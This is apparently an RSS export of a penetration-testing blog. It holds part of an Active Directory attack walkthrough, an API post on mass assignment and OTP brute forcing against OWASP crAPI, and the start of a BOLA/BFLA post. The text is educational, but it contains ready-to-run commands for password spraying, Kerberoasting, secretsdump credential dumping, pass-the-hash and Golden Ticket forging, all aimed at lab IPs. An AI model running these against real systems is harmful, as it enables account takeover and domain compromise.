Finally, [for a relatively secure approach to username enumeration without triggering account lockouts within the domain, you can utilize Kerbrute](https://www.kayssel.com/post/kerberos/#kerberos-brute-force-attack-cracking-the-code). The following command accomplishes this task:

```bash
./kerbrute_linux_amd64 userenum -d shadow.local usernames.txt

```

# Acquiring Valid Credentials: Gaining Access to the Network

In the previous phase, you should have obtained Active Directory usernames. However, what&apos;s crucial now is acquiring valid credentials, specifically the passwords associated with these accounts. One effective method for this is to employ the Kerberos ASREProast attack, which enables the retrieval of tickets that, when cracked, can yield a user&apos;s password.

To execute this attack, you can use the following commands:

1.  Obtain tickets with Impacket&apos;s `GetNPUsers`:

```bash
impacket-GetNPUsers shadow.local/ -usersfile usernames.txt -dc-ip 192.168.253.130 -format hashcat -outputfile asreproast-hashes.txt

```

2.  Attempt to crack the obtained hashes:

```bash
hashcat -m 18200 --force -a 0 asreproast-hashes.txt pass.txt

```

An alternative approach to gaining access is to execute brute force attacks using tools like crackmapexec or kerbrute. However, it&apos;s crucial to consider the domain&apos;s password policy to prevent user account lockouts before proceeding with these attacks.
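To make the lockout consideration concrete: if the policy locks an account after N failed attempts within an observation window, spray comfortably fewer than N passwords per user per window. A toy calculation (the safety margin of 2 is an assumption for illustration, not an AD rule):

```python
# Attempts per user per lockout-observation window, keeping a safety margin.
# margin=2 is an arbitrary safety buffer, not a value defined by AD policy.
def safe_attempts(lockout_threshold, margin=2):
    return max(lockout_threshold - margin, 0)

# A threshold of 5 bad attempts per window leaves room for 3 spray attempts.
print(safe_attempts(5))  # 3
```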

[Using kerbrute for password spraying with a safe mode:](https://www.kayssel.com/post/kerberos/#kerberos-brute-force-attack-cracking-the-code)

```bash
./kerbrute_linux_amd64 passwordspray -d shadow.local usernames.txt Password123 --safe

```

Brute forcing with Kerbrute, considering the password policy:

```bash
cat userpass.txt | ./kerbrute -d shadow.local bruteforce -

```

[Using crackmapexec for SMB with a list of usernames and a common password:](https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics/#from-reconnaissance-to-credentials)

```bash
crackmapexec smb 192.168.253.130 -u users.txt -p Password1

```

&lt;details&gt;
&lt;summary&gt;Attempting SMB access with a specific username and a password list:&lt;/summary&gt;

```bash
crackmapexec smb 192.168.253.128 -u &quot;ironhammer&quot; -p password.txt

```
&lt;/details&gt;


Finally, if you are not directly connected via VPN, you may attempt to obtain [NTLMv2 hashes](https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics/#connecting-to-net-ntlm-hashes-retrieval) or execute [NTLM relay](https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics/#leading-to-ntlm-relay-attack). These attacks have the potential to provide both usernames and passwords for accessing machines. In the optimal scenario, utilizing the &apos;NTLM Relay&apos; attack, you can intercept traffic from administrator users, potentially allowing you to dump the Security Account Manager (SAM) from the target machines.

# Advanced Enumeration with Domain Users: Expanding Your Reach

Once you&apos;ve acquired a domain user, a multitude of possibilities within Active Directory become accessible. One of the most compelling methods for obtaining credentials with elevated privileges in the domain is through the [Kerberoast attack](https://www.kayssel.com/post/kerberos/#harnessing-kerberoast-targeting-the-heart-of-kerberos-tgs-exchange):

1.  Retrieve Service Principal Names (SPNs) using Impacket:

```bash
impacket-GetUserSPNs &apos;shadow.local/beruinsect:Password4&apos; -dc-ip 192.168.253.130 -request -outputfile kerberoast-hashes.txt

```

2.  Attempt to crack the obtained Kerberoast hashes:

```bash
hashcat -m 13100 --force -a 0 kerberoast-hashes.txt pass.txt

```

Alternatively, you could initiate login sessions on other machines using the user accounts you&apos;ve identified. There were primarily two common options for this, which we encountered: evil-winrm and psexec. Additionally, Remote Desktop Protocol (RDP) can serve as another viable method for accessing and managing machines within the network. However, to utilize any of these methods successfully, your user account or the targeted computer had to meet certain requirements. I delved deeper into these concepts in the following chapter.

[Mastering Windows Remote Secrets: Techniques and Tools for Unveiling Hidden Realms](https://www.kayssel.com/post/active-directory-3-windows-computers/)

For practical purposes, here are three example commands employing these tools:

1.  `evil-winrm -i 192.168.253.130 -u administrator -p &apos;P@$$w0rd!&apos;`
2.  `impacket-psexec Administrator@192.168.253.130`
3.  `xfreerdp /d:domain /u:&lt;username&gt; /p:&lt;password&gt; /v:&lt;ip&gt;`

After logging in, the first thing I recommend is to scan all directories for sensitive files to find credentials or passwords. You&apos;ll be surprised how often such information is left accessible on machines. To automate this process, you can utilize the following PowerShell script:

```powershell
Get-ChildItem -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.kdbx,*.ini,*.log,*.xml,*.git* -File -Recurse -ErrorAction SilentlyContinue -Exclude desktop.ini

```

Another alternative is to use LaZagne. This tool allows you to automate the gathering of credentials.

[GitHub - AlessandroZ/LaZagne: Credentials recovery project](https://github.com/AlessandroZ/LaZagne)

On the other hand, it&apos;s recommended that you gather information from the entire domain to better understand how to reach your targets effectively. Here are some questions you should consider:

![](/content/images/2023/10/image-82.png)

Anyway, to delve deeper into the process of collecting all this information with tools like PowerView, I&apos;ve dedicated an entire chapter to this topic.

[Active Directory Enumeration: Automated and Manual Techniques for Privilege Escalation](https://www.kayssel.com/post/introduction-to-active-directory-9-enumeration/)

It&apos;s worth noting that, concurrently, it&apos;s advisable to run BloodHound to swiftly and effortlessly gather all domain information. Below is a bloodhound-python command to collect this data (more details are included in the chapter linked above):

```bash
bloodhound-python -u beruinsect -p &apos;Password1&apos; -ns 192.168.253.120 -d shadow.local -c all --zip 

```

# Privilege Escalation and Pivoting: Scaling Your Influence

Once we have gathered the necessary information and gained a comprehensive understanding of the domain, the next logical step is to attempt to escalate privileges on the machines. This allows us to explore the possibility of accessing additional information or even gaining control over the entire domain. BloodHound often provides valuable insights into potential privilege escalation paths, making it a crucial tool in our arsenal. Additionally, if we identify machines within the network to which we previously lacked access, pivoting to this new network can open up fresh opportunities for exploration.

Privilege escalation on machines typically revolves around four primary types of vulnerabilities:

1.  [DLL hijacking](https://www.kayssel.com/post/dll-hijacking/): DLL hijacking involves exploiting insecure loading mechanisms in Windows applications to execute malicious code by replacing a legitimate Dynamic Link Library (DLL) with a malicious one. When an application attempts to load a DLL, if the DLL is not found in the specified path, Windows searches several predefined directories, including the current working directory. Attackers can place a malicious DLL with the same name as the one expected by the application in a directory that is searched before the legitimate one, thereby causing the application to load the malicious DLL instead.
2.  [Unquoted Service Paths](https://www.kayssel.com/post/unquoted-service-path/): Unquoted service paths refer to a vulnerability where the path to an executable used by a Windows service does not have quotes around it. This can lead to unintended behavior when the service attempts to execute the executable. Specifically, if the path contains spaces and is not enclosed in quotes, Windows may interpret the executable&apos;s path incorrectly, potentially allowing an attacker to substitute a malicious executable in place of the intended one.
3.  [Exploiting Scheduled Tasks](https://www.kayssel.com/post/task-scheduler/): Exploiting scheduled tasks involves leveraging misconfigured or insecurely configured scheduled tasks in Windows to execute arbitrary commands or code with elevated privileges. Attackers can exploit weaknesses in the configuration of scheduled tasks to gain unauthorized access or execute malicious actions on the system.
4.  [SeImpersonatePrivilege](https://www.kayssel.com/post/seimpersonateprivilege/): SeImpersonatePrivilege is a user right that allows a process to impersonate any token that has the &quot;Impersonate a client after authentication&quot; user right. This privilege is often assigned to services or processes that require the ability to impersonate a client&apos;s security context, such as server applications that handle client requests. However, if this privilege is misconfigured or granted unnecessarily, it can be exploited by attackers to impersonate other users or escalate their privileges within the system. Attackers may abuse this privilege to gain unauthorized access to sensitive resources or execute malicious actions while masquerading as legitimate users or processes.
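To see why an unquoted service path is exploitable, consider the order in which Windows tries candidate executables when the path contains spaces: it cuts the path at each space and appends `.exe`. The small sketch below (plain Python, purely for illustration) reproduces that search order:

```python
# Candidate executables Windows may try, in order, for an unquoted
# service path containing spaces.
def unquoted_candidates(path):
    parts = path.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [path]

for candidate in unquoted_candidates(r"C:\Program Files\My App\service.exe"):
    print(candidate)
# C:\Program.exe
# C:\Program Files\My.exe
# C:\Program Files\My App\service.exe
```

An attacker who can write to `C:\` or `C:\Program Files\` plants a binary at one of the earlier candidates and waits for the service to restart.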

Additionally, I recently authored three privilege escalation techniques leveraging common groups in Active Directory environments.

[Three Keys to the Kingdom: Uncovering the Roles of Account Operators, Backup Operators, and Event Log Readers in Offensive Security](https://www.kayssel.com/post/interesting-groups-ad/)

As for pivoting, I prefer chisel for its convenience and reliability. Specifically, I opt for reverse dynamic port forwarding (a SOCKS proxy over a reverse tunnel), which I find the most practical and firewall-friendly approach.

&lt;details&gt;
&lt;summary&gt;To set up chisel on the server side:&lt;/summary&gt;

```bash
chisel_linux server -p 1234 -reverse
```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;And on the client side for Windows:&lt;/summary&gt;

```bash
chisel_windows.exe client &lt;ServerIP&gt;:1234 R:&lt;LocalSOCKSPort&gt;:socks
```
&lt;/details&gt;


For more information and techniques I leave you the next chapter of the series:

[Mastering Active Directory Pivoting: Advanced Techniques and Tools](https://www.kayssel.com/post/pivoting-1/)

# Credential Dumping and Lateral Movement: Expanding Your Foothold

Once we&apos;ve obtained a user with elevated privileges on a machine, the next logical step is to extract every credential stored on it. These newly acquired credentials facilitate lateral movement within the network or, in more advanced cases, even extraction of the domain database (NTDS) once domain administrator credentials are in hand.

One of the most convenient tools for this task is secretsdump, as it simplifies the remote credential dumping process:

```bash
impacket-secretsdump &lt;user&gt;@&lt;ip&gt;
```

However, there are various other tools and techniques available, such as the popular Mimikatz. You can explore the different credential dumping techniques in detail in the dedicated chapter of our series:

[Windows Authentication Deep Dive: Unveiling Protocols, Credential Storage, and Extraction Techniques](https://www.kayssel.com/post/active-directory-4-secrets-in-windows-systems/)

If you manage to obtain NTLM hashes through the credential dump, you can utilize them for lateral movement using the Pass the Hash technique. Pass the Hash involves using the captured NTLM hashes to authenticate and gain access to other machines within the network without needing the plaintext passwords.

```bash
impacket-psexec beruinsect@192.168.253.131 -hashes &quot;:c4b0e1b10c7ce2c4723b4e2407ef81a2&quot;

```

Additionally, &quot;[Over Pass The Hash](https://www.kayssel.com/post/kerberos/#mastering-over-pass-the-hash-in-kerberos-authentication)&quot; serves as a sophisticated lateral movement technique beyond the conventional Pass the Hash approach. It involves the strategic use of a compromised user&apos;s NTLM hash or AES keys to request Kerberos TGT tickets. This advanced method is pivotal for executing privilege escalation and lateral movement within a target system. By exploiting the Kerberos authentication protocol, attackers can seamlessly traverse the network, accessing various resources without the need for the actual user&apos;s plaintext password.

```bash
impacket-getTGT shadow.local/ironhammer -hashes :7247e8d4387e76996ff3f18a34316fdd -dc-ip 192.168.253.130

export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/ironhammer.ccache
impacket-psexec -dc-ip 192.168.253.130 -target-ip 192.168.253.131 -no-pass -k shadow.local/ironhammer@pc-beru.shadow.local

```

Another key strategy for lateral movement is leveraging Kerberos tickets, known as [Pass the Ticket](https://www.kayssel.com/post/kerberos/#understanding-pass-the-ticket-in-kerberos-authentication). This technique utilizes Kerberos tickets obtained from compromised accounts, allowing attackers to authenticate and gain access to other network resources seamlessly, thus bypassing the need for plaintext passwords.

```bash
lsassy -d shadow.local -u ironhammer -p Password4 192.168.253.131 -K tickets
export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/tickets/beru.ccache

```

Achieving domain administrator credentials marks a significant milestone, as it grants complete control over the domain. With such access, the secretsdump command can be used to extract the NTDS, unlocking access to all users and machines within the domain. This chapter has detailed various techniques for extracting the domain database, highlighting their importance in the context of network penetration and control.

[Unveiling the Secrets of Domain Controllers: A Journey into Active Directory Security](https://www.kayssel.com/post/active-directory-2-computers/)

# Domain Dominance: Establishing Control

This final phase is not typically part of standard pentesting procedures and is often more relevant to red teams seeking to establish persistence within a domain. Nonetheless, I&apos;ve included it because I believe it represents the pinnacle of what can be achieved in Active Directory auditing.

Firstly, we have what is commonly known as a &quot;Silver Ticket&quot;. This type of ticket is utilized to maintain persistent access to a specific service within the Active Directory environment. To create a Silver Ticket, one requires the NT hash of the account running the targeted service. This technique proves particularly valuable in scenarios where access to services such as CIFS or LDAP on a domain controller has been obtained.

The second option is known as a &quot;Golden Ticket&quot;, which, as the name suggests, is even more powerful than the Silver Ticket. Unlike the Silver Ticket technique, creating a Golden Ticket requires compromising the entire domain or obtaining the NT hash of the user krbtgt, which is necessary for forging this type of ticket.

With a Golden Ticket, an attacker can fabricate tickets for any service on any machine within the domain, granting unparalleled access and control, thus making it an exceptionally potent technique.

To illustrate, you can use tools like `impacket-ticketer` to generate a Golden Ticket by providing the domain SID and the NT hash of the krbtgt user:

```bash
impacket-ticketer -domain-sid S-1-5-21-1545742773-2923955266-673312136 -nthash 011948128d80ec39af3a837c5d153dea -domain shadow.local administrator
```

After generating the Golden Ticket, you can use it to authenticate and gain access to machines within the domain. For example, you can use `impacket-psexec` to execute commands on a target machine:

```bash
export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/administrator.ccache
impacket-psexec -dc-ip 192.168.253.130 -target-ip 192.168.253.130 -no-pass -k shadow.local/administrator@dc-shadow.shadow.local
```

For both techniques, you can refer to the following link for further information:

[Decoding Kerberos: Understanding the Authentication Process and Main Attacks](https://www.kayssel.com/post/kerberos/)

# Conclusion

In traversing the depths of Active Directory auditing, we&apos;ve embarked on a journey from foundational concepts to advanced techniques, delving into the intricacies of network penetration and control. This series has been crafted with the aim of equipping junior pentesters with the essential knowledge to conduct proficient audits while providing references for further exploration.

By navigating through the various phases outlined in this article, you&apos;ve gained a comprehensive understanding of Active Directory auditing. From basic reconnaissance to privilege escalation and lateral movement, each step has been meticulously detailed, allowing you to navigate the complex landscape of network security with confidence.

Furthermore, the inclusion of advanced techniques such as DLL hijacking, Pass the Hash, and Golden Ticket forging illustrates the depth of knowledge required to achieve domain dominance. While these methods may not align with standard pentesting procedures, their inclusion underscores the significance of persistence within a domain environment.

As you continue to hone your skills in Active Directory auditing, I encourage you to leverage the wealth of resources provided throughout this series. Whether it&apos;s setting up your own lab environment or exploring specialized tools like BloodHound and LaZagne, the possibilities for learning and growth are endless.

In closing, I trust that this series has empowered you to navigate the complexities of Active Directory with ease, laying the foundation for a successful career in cybersecurity. Remember, knowledge is the key to resilience in the ever-evolving landscape of network security. Keep exploring, keep learning, and never cease to push the boundaries of your expertise.

Happy auditing!</content:encoded><author>Ruben Santos</author></item><item><title>API Security Under the Microscope: Unmasking Mass Assignment and Broken User Authentication</title><link>https://www.kayssel.com/post/mass-assignment-broken-user-auth</link><guid isPermaLink="true">https://www.kayssel.com/post/mass-assignment-broken-user-auth</guid><description>This chapter delves into Mass Assignment and Broken User Authentication, offering insights on identifying and mitigating these API vulnerabilities. Gain strategies to secure your digital assets and enhance your cybersecurity posture.</description><pubDate>Sun, 04 Feb 2024 15:26:56 GMT</pubDate><content:encoded># Introduction

Welcome to the latest chapter in our API hacking series, where we dive deep into Mass Assignment and Broken User Authentication vulnerabilities. Having explored the essentials of API security, this installment takes a closer look at these specific threats, offering insights into their detection and mitigation. We&apos;ll break down Mass Assignment&apos;s potential for unauthorized data manipulation and tackle the challenges of securing user authentication processes. Through practical examples and strategic advice, this chapter aims to arm you with the necessary tools and knowledge to enhance the security of your APIs, ensuring a robust defense against these common but critical vulnerabilities. Let&apos;s embark on this journey to fortify our digital fortresses.

# **Mass Assignment: The Hidden Pitfall in API Security**

Beginning with Mass Assignment, we delve into a subtle yet perilous vulnerability in API security. This risk arises when applications blindly trust user input, linking it directly to object properties and creating a potential backdoor for attackers. Such a flaw can lead to unauthorized modifications and system access, underlining the need for vigilant input handling and validation protocols.

## **Unveiling the Threat: A Closer Look at the Impact**

The consequences of Mass Assignment can be severe, ranging from data breaches to privilege escalations. It’s not just about changing a user&apos;s role or accessing sensitive data; it&apos;s about the potential havoc an attacker could wreak through a single overlooked vulnerability.

## **Detection and Prevention: Safeguarding Your API**

The detection of this vulnerability typically involves examining parameters within the responses of legitimate requests or making educated guesses about potential parameters a request might accept. For instance, in a registration endpoint that collects a username and password, an extra parameter such as &apos;isAdmin&apos; could be injected and set to &apos;true&apos; to elevate privileges. As penetration testers, we might deliberately guess such parameters or spot them in requests and responses generated by the application.
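
The underlying flaw is easy to reproduce in a few lines. The hypothetical handler below (illustrative Python, not crAPI&apos;s actual code) binds every client-supplied field onto the user object, so an injected admin flag silently escalates privileges:

```python
# Hypothetical vulnerable profile update: every client-supplied field is
# bound straight onto the user object (mass assignment). Names are
# illustrative, not crAPI's real implementation.
class User:
    def __init__(self, username):
        self.username = username
        self.is_admin = False  # must only ever be set server-side

def update_profile(user, request_json):
    for key, value in request_json.items():
        setattr(user, key, value)  # no allow-list: this is the bug
    return user

def update_profile_safe(user, request_json):
    allowed = {"username", "email"}  # explicit allow-list of fields
    for key in allowed.intersection(request_json):
        setattr(user, key, request_json[key])
    return user

u = update_profile(User("beru"), {"username": "beru", "is_admin": True})
print(u.is_admin)  # True: the client just made itself an admin
```

The fix is the allow-list shown in `update_profile_safe`: bind only the fields a client is supposed to control.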

## **Exploring Mass Assignment: crAPI Examples**

### **First Example: The Simple Case**

As we advance in our exploration, building on the insights from the previous chapter, our investigation takes a significant turn when we experiment with changing the name of a video uploaded by a user. This process unveils a critical aspect of server interaction—how it responds with various parameters upon receiving our request.

![](/content/images/2024/01/image-74.png)

Change name

![](/content/images/2024/01/image-76.png)

Parameters of the request

A pivotal point in our analysis is the examination of the Mass Assignment vulnerability. Our methodical testing aims to uncover if parameters, when included in the request, are echoed back in the server&apos;s response, potentially altered. Among the parameters tested, including the &apos;id&apos; in hopes of altering access to other videos, it was the &apos;conversion\_params&apos; parameter that stood out. This parameter, responsible for setting the video&apos;s conversion settings, proved to be susceptible to Mass Assignment. By modifying &apos;conversion\_params&apos; in our request, we observed a direct alteration in the response. This finding not only demonstrates the vulnerability to Mass Assignment but also underscores the importance of scrutinizing how server responses reflect the changes made to request parameters, thereby influencing the video conversion process.

![](/content/images/2024/01/image-77.png)

Change of video conversion settings via Mass Assignment

This initial example, though appearing simple at first glance, serves as a potent illustration of the ease with which Mass Assignment vulnerabilities can be exploited. This is true even in settings that might initially seem harmless or secure.

### **Second Example: The Intricate Case**

Now, let&apos;s shift our focus to a more complex scenario in an online store setting. Imagine selecting and purchasing an item, which then generates a unique identifier for the transaction. This process, while common, can reveal a lot about the underlying API structure and potential vulnerabilities:

![](/content/images/2024/01/image-64.png)

Product Purchase

![](/content/images/2024/01/image-66.png)

Product purchase request

Upon reviewing the order, we uncover not just details about the item, but also various methods that the API permits. This is where our exploration takes an interesting turn:

![](/content/images/2024/01/image-68.png)

Permitted methods

An initial experiment is to switch the method to POST and try to modify parameters seen in the earlier response, such as the &apos;status&apos; or the purchase ID. When I introduced the &apos;status&apos; parameter, the system also demanded that &apos;Product\_id&apos; and &apos;quantity&apos; be specified. Yet even with those fields supplied, the backend simply ignored the extra parameter, so the POST method leaves us little room for manipulation.

![](/content/images/2024/01/image-69.png)

Method change to POST

Conversely, if we switch the request method to PUT and include the &apos;status&apos; parameter, the server returns a new error that helpfully lists the statuses a product can assume: &apos;Delivered,&apos; &apos;Return Pending,&apos; or &apos;Returned.&apos; The most intriguing option is &apos;Returned&apos;: not only would we be refunded the product&apos;s cost, but since the item is already in the shipping process, we would also keep it for free.

![](/content/images/2024/01/image-70.png)

Request using Put method

This unexpected turn of events, where altering the status to &apos;returned&apos; results in an unforeseen refund, serves as a remarkable illustration of Mass Assignment in action. It underscores how even a seemingly minor status modification can carry significant financial consequences:

![](/content/images/2024/01/image-72.png)

Change of status

![](/content/images/2024/01/image-73.png)

We earn 10 dollars

# **Broken User Authentication: Unveiling the Chink in Our Digital Armor**

After unveiling the intricacies of Mass Assignment vulnerabilities, our journey through the API security landscape propels us towards another formidable challenge: Broken User Authentication. This peril emerges when authentication mechanisms are misconfigured or poorly implemented, leaving a crack in our digital armor through which attackers can slip, assuming identities not their own.

## **The Crux of Broken User Authentication**

Imagine a fortress where the gates occasionally recognize the enemy as a friend, allowing them access to the most guarded secrets. This is the reality of Broken User Authentication - a scenario where attackers exploit weak spots in authentication processes to gain unauthorized access to user accounts, personal data, and privileged information. The repercussions can range from data breaches to complete account takeover, casting a long shadow over the integrity of digital services.

## **Detecting and Diagnosing the Breach**

Start by thoroughly analyzing the authentication process, paying close attention to weaknesses in password management, session handling, or security questions. Examine the application&apos;s responses to legitimate requests for any anomalies that could point to vulnerabilities. Additionally, make educated guesses by manipulating parameters or credentials to uncover potential access issues. Remember, while automated tools are valuable, human intuition and an eye for subtle irregularities can be the key to exposing this critical weakness.

## **Fortifying the Ramparts: Mitigation Strategies**

The key to mitigating Broken User Authentication lies in embracing best practices for secure authentication. Implementing multi-factor authentication (MFA), ensuring robust password policies, and securing session management are the cornerstones of a fortified defense. Regularly updating and auditing authentication mechanisms also ensure that the security measures evolve in tandem with emerging threats.

## **Navigating the Maze of Password Changes**

Venturing into the realm of user authentication, let&apos;s dissect the password change process. Initially, upon submitting an email, we&apos;re informed that a verification code, a guardian of our digital identity, is dispatched to our inbox.

![](/content/images/2024/01/image-49.png)

Password change functionality

![](/content/images/2024/01/image-50.png)

Password change request

![](/content/images/2024/01/image-51.png)

OTP generated

Upon retrieving the code, a successful entry acts as the key to altering our password, a crucial step in securing our digital persona.

![](/content/images/2024/01/image-52.png)

Successful change

However, a closer inspection of the password change mechanism reveals a critical vulnerability. Repeated trials expose the code as a mere 4-digit barricade. This simplicity beckons the question of its susceptibility to brute force attacks, threatening the sanctity of user accounts.

![](/content/images/2024/01/image-53.png)

OTP verification request

Imagine targeting a known user, &apos;beruinsect&apos;. Knowing their email allows us to embark on a quest to reset their password.

![](/content/images/2024/01/image-54.png)

Change of password to Beru

Employing tools like Burp Intruder, we simulate a brute force siege, attempting all combinations from 0000 to 9999, a testament to perseverance and cunning.

![](/content/images/2024/01/image-55.png)

Data entered

![](/content/images/2024/01/image-56.png)

Request on Burp Intruder

![](/content/images/2024/01/image-62.png)

Intruder configuration

Our efforts bear fruit, revealing a glaring absence of defenses against such brute force invasions. The response size betrays the correct OTP, allowing us to usurp control over the account.

![](/content/images/2024/01/image-61.png)

Successful brute force attack

For those without the luxury of Burp Pro, alternative tools like FFUF offer a swifter path to victory, showcasing the adaptability of a modern hacker.

```bash
seq -w 0000 9999 &gt; numbers.txt
```

```bash
ffuf -request brute.txt -w numbers.txt -request-proto http -replay-proxy http://127.0.0.1:8080 -ms 200
```

-   `-w` specifies the wordlist for fuzzing, targeting various inputs.
-   `-request` allows for custom request templates, giving flexibility in crafting test cases.
-   `-request-proto` sets the request protocol, crucial for distinguishing between HTTP and HTTPS.
-   `-replay-proxy` directs traffic through a proxy, integrating seamlessly with tools like Burp Suite for in-depth analysis.
-   `-ms` filters responses by size, pinpointing anomalies that could indicate vulnerabilities.
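
To see why a 4-digit code with no rate limiting falls instantly, here is a toy simulation in Python (no network involved; the function name is invented):

```python
import random

# Toy simulation: a 4-digit OTP with no rate limit falls to brute
# force almost immediately, since the keyspace is only 10000 codes.
def brute_force_otp(secret):
    """Try every code from 0000 to 9999 in order; return attempts used."""
    for attempt in range(10000):
        code = f"{attempt:04d}"
        if code == secret:
            return attempt + 1
    raise ValueError("code outside keyspace")

random.seed(7)
secret = f"{random.randrange(10000):04d}"
print(brute_force_otp(secret))  # never more than 10000 attempts
```

At even 50 requests per second, the full keyspace takes under four minutes to exhaust, and half that on average.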

A final word of caution: this vulnerability also opens the door to user enumeration, as the application&apos;s response to non-existent emails unveils potential targets. Moreover, through a brute-force attack using a wordlist of commonly known usernames, malicious actors could potentially identify users of the application, creating an opportunity to change their passwords indiscriminately.

![](/content/images/2024/01/image-63.png)

User Enumeration
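
In code terms, the enumeration oracle is nothing more than two different responses from the same endpoint. A hypothetical sketch (invented addresses and messages):

```python
# Toy sketch of user enumeration: the vulnerable reset endpoint answers
# differently for existing and non-existing accounts.
REGISTERED = {"beru@shadow.local", "ironhammer@shadow.local"}

def forgot_password(email):
    # Vulnerable: the message itself reveals whether the account exists
    if email in REGISTERED:
        return "OTP sent to your email"
    return "email not registered"

def forgot_password_fixed(email):
    # Safe: identical response either way
    return "If this account exists, an OTP has been sent"

candidates = ["beru@shadow.local", "ghost@shadow.local"]
hits = [e for e in candidates if forgot_password(e) == "OTP sent to your email"]
print(hits)  # only the registered address stands out
```

Returning the same generic message in both cases, as `forgot_password_fixed` does, closes the oracle.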

# Conclusion

As we close this chapter on Mass Assignment and Broken User Authentication, it&apos;s clear that the path to securing APIs is both challenging and crucial. Through exploring these vulnerabilities, we&apos;ve uncovered not just the risks they pose, but also the strategies to mitigate them. Remember, the key to enhancing API security lies in understanding the threats, vigilance in monitoring, and continuous improvement of defenses. Armed with the knowledge shared in this series, you&apos;re better equipped to protect your digital assets against these pervasive security challenges. Let&apos;s continue to fortify our APIs, one vulnerability at a time.</content:encoded><author>Ruben Santos</author></item><item><title>Securing the Gates: Mastering BOLA and BFLA in API Security</title><link>https://www.kayssel.com/post/bola-and-bfla</link><guid isPermaLink="true">https://www.kayssel.com/post/bola-and-bfla</guid><description>Explore BOLA and BFLA in API security. Uncover how BOLA leads to unauthorized data access and BFLA allows executing restricted functions. Through practical demonstrations with OWASP&apos;s crAPI, understand the critical need for stringent authorization in APIs.</description><pubDate>Sun, 28 Jan 2024 19:07:30 GMT</pubDate><content:encoded># **Introduction**

Welcome to our ongoing exploration of API security, a journey into the heart of digital safeguards. In this chapter, we turn the spotlight on two pivotal yet often underappreciated vulnerabilities: Broken Object Level Authorization (BOLA) and Broken Function Level Authorization (BFLA). Building on our insights from [JWT](https://www.kayssel.com/post/api-hacking-2-2/), we&apos;ll dive deeper, unraveling the complexities of BOLA and BFLA. Join me as we dissect these vulnerabilities through a blend of theoretical insights and practical demonstrations using OWASP&apos;s crAPI. Whether you&apos;re a seasoned developer or a budding security enthusiast, this chapter promises to enrich your understanding and equip you with the tools to enhance your API defenses.

# **Understanding Broken Object Level Authorization (BOLA)**

Let&apos;s dive into the world of BOLA - a sneaky security flaw that&apos;s like a wolf in sheep&apos;s clothing in the realm of API security. Imagine a club bouncer who forgets to check IDs; that&apos;s BOLA for you. It lets uninvited guests sneak into places they shouldn&apos;t be. Now, think about this: If you were to assess an API you are familiar with, where do you think BOLA vulnerabilities might exist? How would these vulnerabilities impact the overall security of the application?

## What Exactly is BOLA?

Think of BOLA as a digital loophole. It&apos;s when an app is a bit too trusting, letting users peek into data that&apos;s not meant for their eyes. This is especially risky when we&apos;re talking about sensitive info like personal or financial data.

## How Does BOLA Sneak Up?

BOLA is like leaving your car unlocked with the keys inside. It happens when APIs don&apos;t ask, &quot;Hey, should you really be here?&quot; when users request access to specific data. The main culprits? Not being strict enough with permissions and forgetting to double-check if a user should access certain info.

## The Ripple Effect of BOLA

Imagine if someone could read your diary or access your bank details - scary, right? That&apos;s the kind of drama BOLA can cause. It can lead to privacy nightmares, data theft, and even let hackers play puppeteer with other people&apos;s accounts.

## Spotting BOLA in the Wild

Finding BOLA requires playing detective - scrutinizing how APIs handle access to data. It&apos;s about testing every nook and cranny, using different user hats, and seeing if you can sneak a peek at data that&apos;s supposed to be off-limits.
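
In code terms, BOLA is simply an object lookup that never checks ownership. A hypothetical endpoint sketch (illustrative names and data, not crAPI&apos;s implementation):

```python
# Toy data store: vehicle_id maps to owner and location data
VEHICLES = {
    "649acfac": {"owner": "alice", "location": "40.71,-74.00"},
    "b21d7f33": {"owner": "bob", "location": "34.05,-118.24"},
}

def get_vehicle_vulnerable(session_user, vehicle_id):
    # BOLA: returns whatever vehicle the caller names; owner never checked
    return VEHICLES[vehicle_id]

def get_vehicle_fixed(session_user, vehicle_id):
    vehicle = VEHICLES[vehicle_id]
    if vehicle["owner"] != session_user:
        raise PermissionError("not your vehicle")
    return vehicle

# alice reads bob's location through the vulnerable version
print(get_vehicle_vulnerable("alice", "b21d7f33")["location"])
```

The only difference between the two versions is the ownership check, which is exactly the control BOLA-vulnerable APIs omit.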

## **A Practical Exploration of BOLA with OWASP crAPI**

Our journey through crAPI starts with a familiar task after logging in: adding vehicles to our dashboard. Simply click &quot;Click Here,&quot; and an email wings its way to you via Mailhog. To peek at this email, just head over to Mailhog&apos;s web interface. It&apos;s easy - type `http://[ip of crapi]:8025/` into your browser, and you&apos;re in!

![](/content/images/2024/01/image-46.png)

Link to add vehicle

![](/content/images/2024/01/image-26.png)

Mailhog

![](/content/images/2024/01/image-24.png)

Vehicle details

What&apos;s next? That &apos;refresh info&apos; button on our new vehicle is more than just a button - it&apos;s a gateway to hidden data, revealing not just the car&apos;s location but also an intriguing endpoint identifier.

![](/content/images/2024/01/image-27.png)

Car added

![](/content/images/2024/01/image-28.png)

Car ID

Here, we introduce &quot;Firefox Containers,&quot; a nifty Firefox extension that allows for multiple browser sessions in isolated tabs. This means we can log into different user accounts simultaneously without logging out, perfect for testing authorization without the hassle of juggling multiple browsers or incognito windows.

[Firefox Multi-Account Containers – Get this Extension for 🦊 Firefox (en-US)](https://addons.mozilla.org/en-US/firefox/addon/multi-account-containers/)

![](/content/images/2024/01/image-32.png)

Firefox&apos;s containers with two different users

By intercepting the vehicle data refresh request in Burp and altering the car identifier, we step into another user&apos;s shoes, viewing their car data. This is BOLA in action, a clear demonstration of why proper authorization checks are crucial.

![](/content/images/2024/01/image-47.png)

Change of identifier

# **Breaking Down Broken Function Level Authorization (BFLA)**

Following our exploration of BOLA, we now pivot to another crucial aspect of API security vulnerabilities: Broken Function Level Authorization (BFLA). BFLA is akin to having a master key in the wrong hands. It occurs when users are able to execute functions that are out of bounds for their access level, potentially leading to severe security breaches. Reflect for a moment: Why do you think securing each function within an API is crucial, and how might overlooking this lead to significant security risks?

## Understanding BFLA

